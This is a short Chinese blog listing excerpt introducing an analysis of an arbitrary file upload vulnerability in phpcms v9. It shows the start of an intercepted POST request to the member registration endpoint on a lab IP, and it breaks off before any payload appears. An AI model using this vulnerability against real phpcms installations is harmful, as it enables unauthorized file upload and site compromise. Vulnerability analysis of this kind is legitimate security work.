分类：phpcmsv漏洞

2020
10-20

phpcmsv9.0任意文件上传漏洞解析

漏洞存在地址：burp抓包POST/phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1HTTP/1.1Host:192.168.0.109User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:81.0)Gecko/20100101Firefox/81.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Enco... 继续阅读 >